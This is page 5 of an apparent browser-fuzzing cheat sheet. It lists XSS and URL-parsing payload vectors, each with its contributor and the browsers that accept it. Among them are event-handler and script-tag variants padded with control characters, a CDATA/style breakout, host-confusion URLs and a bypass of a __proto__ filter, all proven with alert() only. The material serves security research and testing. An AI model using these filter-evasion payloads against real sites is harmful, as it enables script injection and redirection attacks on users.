Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 169 vectors with results

"1337"⟦09⟧in0x09alert(9)

Source: Characters allowed in-between operators

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

"1337"
in
alert(10)

Source: Characters allowed in-between operators

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

"1337"0x0Bin0x0Balert(11)

Source: Characters allowed in-between operators

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

"1337"0x0Cin0x0Calert(12)

Source: Characters allowed in-between operators

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

"1337"0x0Din0x0Dalert(13)

Source: Characters allowed in-between operators

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafari

s = "0";0x0D
if (typeof s["0x00__proto__"] != "undefined") {0x0D
    alert(fromCodePoint(0));0x0D
}

Source: Bypass __proto__ string match defense

Author: vitorfhc

JSBrowser QuirksChrome

anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(33);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(33)

Source: Characters unencoded characters supported in the hash

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(36);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(36)

Source: Characters unencoded characters supported in the hash

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(37);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(37)

Source: Characters unencoded characters supported in the hash

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(38);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(38)

Source: Characters unencoded characters supported in the hash

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(39);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(39)

Source: Characters unencoded characters supported in the hash

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

<a href="0x01//example2.com" id=x></a>

Source: Characters allowed before slashes which result in an external URL

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="0x02//example2.com" id=x></a>

Source: Characters allowed before slashes which result in an external URL

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="0x03//example2.com" id=x></a>

Source: Characters allowed before slashes which result in an external URL

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="0x04//example2.com" id=x></a>

Source: Characters allowed before slashes which result in an external URL

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="0x05//example2.com" id=x></a>

Source: Characters allowed before slashes which result in an external URL

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

try{0x0D
   encodeURIComponent(String.fromCodePoint(55296))0x0D
} catch {0x0D
   alert(55296);0x0D
}

Source: Characters that cause exceptions when URL encoded

Author: hackvertor

JSXSS ExecutionChromeSafariFirefox

try{0x0D
   encodeURIComponent(String.fromCodePoint(55297))0x0D
} catch {0x0D
   alert(55297);0x0D
}

Source: Characters that cause exceptions when URL encoded

Author: hackvertor

JSXSS ExecutionChromeSafariFirefox

try{0x0D
   encodeURIComponent(String.fromCodePoint(55298))0x0D
} catch {0x0D
   alert(55298);0x0D
}

Source: Characters that cause exceptions when URL encoded

Author: hackvertor

JSXSS ExecutionChromeSafariFirefox

try{0x0D
   encodeURIComponent(String.fromCodePoint(55299))0x0D
} catch {0x0D
   alert(55299);0x0D
}

Source: Characters that cause exceptions when URL encoded

Author: hackvertor

JSXSS ExecutionChromeSafariFirefox

try{0x0D
   encodeURIComponent(String.fromCodePoint(55300))0x0D
} catch {0x0D
   alert(55300);0x0D
}

Source: Characters that cause exceptions when URL encoded

Author: hackvertor

JSXSS ExecutionChromeSafariFirefox

anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(33);0x0D
if(!/%/.test(anchor+''))alert(33)

Source: Characters not urlencoded when using the credentials part of the URL

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(36);0x0D
if(!/%/.test(anchor+''))alert(36)

Source: Characters not urlencoded when using the credentials part of the URL

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(38);0x0D
if(!/%/.test(anchor+''))alert(38)

Source: Characters not urlencoded when using the credentials part of the URL

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(40);0x0D
if(!/%/.test(anchor+''))alert(40)

Source: Characters not urlencoded when using the credentials part of the URL

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(41);0x0D
if(!/%/.test(anchor+''))alert(41)

Source: Characters not urlencoded when using the credentials part of the URL

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

anchor.href='http://example.com';0x0D
anchor.protocol = 'http' + String.fromCodePoint(83) + ':';0x0D
if(!/http:/.test(anchor.protocol+''))alert(83)

Source: Characters not urlencoded when using the shema part of the URL

Author: d0ge

JSURL HandlingSafariFirefoxChrome

anchor.href='http://example.com';0x0D
anchor.protocol = 'http' + String.fromCodePoint(115) + ':';0x0D
if(!/http:/.test(anchor.protocol+''))alert(115)

Source: Characters not urlencoded when using the shema part of the URL

Author: d0ge

JSURL HandlingSafariFirefoxChrome

anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(33));0x0D
if(!/%/.test(anchor+''))alert(33)

Source: Characters urlencoded that get transformed when using the credentials part of the URL

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(39));0x0D
if(!/%/.test(anchor+''))alert(39)

Source: Characters urlencoded that get transformed when using the credentials part of the URL

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(40));0x0D
if(!/%/.test(anchor+''))alert(40)

Source: Characters urlencoded that get transformed when using the credentials part of the URL

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(41));0x0D
if(!/%/.test(anchor+''))alert(41)

Source: Characters urlencoded that get transformed when using the credentials part of the URL

Author: hackvertor

JSURL HandlingChromeFirefoxSafari

<img src onerror=alert(61)>

Source: Characters allowed instead of equal sign

Author: c3l3si4n

XSSDOM BehaviorChromeFirefox

const x⟦09⟧="x"0x0D
if(x==="x"){alert(9)}

Source: Characters allowed between variable name and equals sign

Author: 0x999-x

JSJavaScript SyntaxChromeFirefox

const x
="x"0x0D
if(x==="x"){alert(10)}

Source: Characters allowed between variable name and equals sign

Author: 0x999-x

JSJavaScript SyntaxChromeFirefox

const x0x0B="x"0x0D
if(x==="x"){alert(11)}

Source: Characters allowed between variable name and equals sign

Author: 0x999-x

JSJavaScript SyntaxChromeFirefox

const x0x0C="x"0x0D
if(x==="x"){alert(12)}

Source: Characters allowed between variable name and equals sign

Author: 0x999-x

JSJavaScript SyntaxChromeFirefox

const x0x0D="x"0x0D
if(x==="x"){alert(13)}

Source: Characters allowed between variable name and equals sign

Author: 0x999-x

JSJavaScript SyntaxChromeFirefox

<img src=x onerror=0x09alert(9)>

Source: Characters allowed after equals sign for event

Author: YouGina

XSSDOM BehaviorFirefoxChrome

<img src=x onerror=
alert(10)>

Source: Characters allowed after equals sign for event

Author: YouGina

XSSDOM BehaviorFirefoxChrome

<img src=x onerror=0x0Balert(11)>

Source: Characters allowed after equals sign for event

Author: YouGina

XSSDOM BehaviorFirefoxChrome

<img src=x onerror=0x0Calert(12)>

Source: Characters allowed after equals sign for event

Author: YouGina

XSSDOM BehaviorFirefoxChrome

<img src=x onerror=0x0Dalert(13)>

Source: Characters allowed after equals sign for event

Author: YouGina

XSSDOM BehaviorFirefoxChrome

<script0x09>alert(9)</script>

Source: Allowed characters right after tag name & before tag closure, no other characters in between

Author: hansmach1ne

XSSHTML ParsingChromeMicrosoft EdgeFirefox

<script
>alert(10)</script>

Source: Allowed characters right after tag name & before tag closure, no other characters in between

Author: hansmach1ne

XSSHTML ParsingChromeMicrosoft EdgeFirefox

<script0x0C>alert(12)</script>

Source: Allowed characters right after tag name & before tag closure, no other characters in between

Author: hansmach1ne

XSSHTML ParsingChromeMicrosoft EdgeFirefox

<script0x0D>alert(13)</script>

Source: Allowed characters right after tag name & before tag closure, no other characters in between

Author: hansmach1ne

XSSHTML ParsingChromeMicrosoft EdgeFirefox

<script >alert(32)</script>

Source: Allowed characters right after tag name & before tag closure, no other characters in between

Author: hansmach1ne

XSSHTML ParsingChromeMicrosoft EdgeFirefox

if (new URL("https://a.com0x00/b").host=="a.com"){0x0D
  var t=document.createElement("a");0x0D
  t.href="https://a.com0x00/b";0x0D
  if (t.host != "a.com")0x0D
  {0x0D
    alert(0);0x0D
  }0x0D
}0x0D
if (new URL("https://0x00a.com/b").host=="a.com"){0x0D
  var t=document.createElement("a");0x0D
  t.href="https://0x00a.com/b";0x0D
  if (t.host != "a.com")0x0D
  {0x0D
    alert(0);0x0D
  }0x0D
}

Source: Characters prepended to URL host. check if difference between URL and a tag

Author: InsertScript

JSURL HandlingChrome

<a href="/0x09/example2.com" id=x></a>

Source: Characters allowed between slashes using XSS type

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="/
/example2.com" id=x></a>

Source: Characters allowed between slashes using XSS type

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="/0x0D/example2.com" id=x></a>

Source: Characters allowed between slashes using XSS type

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="///example2.com" id=x></a>

Source: Characters allowed between slashes using XSS type

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="/\/example2.com" id=x></a>

Source: Characters allowed between slashes using XSS type

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="https://example2.com" id=x></a>

Source: Characters allowed after colon which result in an external URL

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="https:\\example2.com" id=x></a>

Source: Characters allowed after colon which result in an external URL

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="//0x09example2.com" id=x></a>

Source: Characters allowed after slashes which result in an external URL

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="//
example2.com" id=x></a>

Source: Characters allowed after slashes which result in an external URL

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="//0x0Dexample2.com" id=x></a>

Source: Characters allowed after slashes which result in an external URL

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="///example2.com" id=x></a>

Source: Characters allowed after slashes which result in an external URL

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<a href="//@example2.com" id=x></a>

Source: Characters allowed after slashes which result in an external URL

Author: hackvertor

XSSURL HandlingChromeFirefoxSafari

<svg><style>⟦0D⟧
x = "<![CDATA[</style><img title="]]]></style></svg><img src onerror=alert(93)>">

Source: Characters in-between square brackets that close cdata

Author: hackvertor

XSSCSS ParsingChromeFirefoxSafari

var markup = `<a0x09id=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(9)0x0D
 }0x0D
0x0D
0x0D

Source: Characters that can work as attribute seperator

Author: Sudistark

JSDOM BehaviorChrome

var markup = `<a
id=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(10)0x0D
 }0x0D
0x0D
0x0D

Source: Characters that can work as attribute seperator

Author: Sudistark

JSDOM BehaviorChrome

var markup = `<a0x0Cid=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(12)0x0D
 }0x0D
0x0D
0x0D

Source: Characters that can work as attribute seperator

Author: Sudistark

JSDOM BehaviorChrome

var markup = `<a0x0Did=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(13)0x0D
 }0x0D
0x0D
0x0D

Source: Characters that can work as attribute seperator

Author: Sudistark

JSDOM BehaviorChrome

var markup = `<a id=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(32)0x0D
 }0x0D
0x0D
0x0D

Source: Characters that can work as attribute seperator

Author: Sudistark

JSDOM BehaviorChrome

if('1337' + String.fromCodePoint(9) + String.fromCodePoint(9) == 1337){alert(9)}

Source: Loose comparison, characters appended which still result in type coercion

Author: hansmach1ne

JSCharacter EncodingChrome

if('1337' + String.fromCodePoint(10) + String.fromCodePoint(10) == 1337){alert(10)}

Source: Loose comparison, characters appended which still result in type coercion

Author: hansmach1ne

JSCharacter EncodingChrome

if('1337' + String.fromCodePoint(11) + String.fromCodePoint(11) == 1337){alert(11)}

Source: Loose comparison, characters appended which still result in type coercion

Author: hansmach1ne

JSCharacter EncodingChrome

if('1337' + String.fromCodePoint(12) + String.fromCodePoint(12) == 1337){alert(12)}

Source: Loose comparison, characters appended which still result in type coercion

Author: hansmach1ne

JSCharacter EncodingChrome

if('1337' + String.fromCodePoint(13) + String.fromCodePoint(13) == 1337){alert(13)}

Source: Loose comparison, characters appended which still result in type coercion

Author: hansmach1ne

JSCharacter EncodingChrome

if (new URL("https://0x09google.com/endpoint").host=="google.com"){alert(9)}

Source: Characters prepended to URL, which yield in the same host property

Author: InsertScript

JSURL HandlingChromeFirefox

if (new URL("https:///google.com/endpoint").host=="google.com"){alert(47)}

Source: Characters prepended to URL, which yield in the same host property

Author: InsertScript

JSURL HandlingChromeFirefox

if (new URL("https://@google.com/endpoint").host=="google.com"){alert(64)}

Source: Characters prepended to URL, which yield in the same host property

Author: InsertScript

JSURL HandlingChromeFirefox

if (new URL("https://\google.com/endpoint").host=="google.com"){alert(92)}

Source: Characters prepended to URL, which yield in the same host property

Author: InsertScript

JSURL HandlingChromeFirefox

if (new URL("https://google.com/endpoint").host=="google.com"){alert(173)}

Source: Characters prepended to URL, which yield in the same host property

Author: InsertScript

JSURL HandlingChromeFirefox

Page 5 of 9

« Prev Next »

Cheat Sheet

Distributed Fuzzing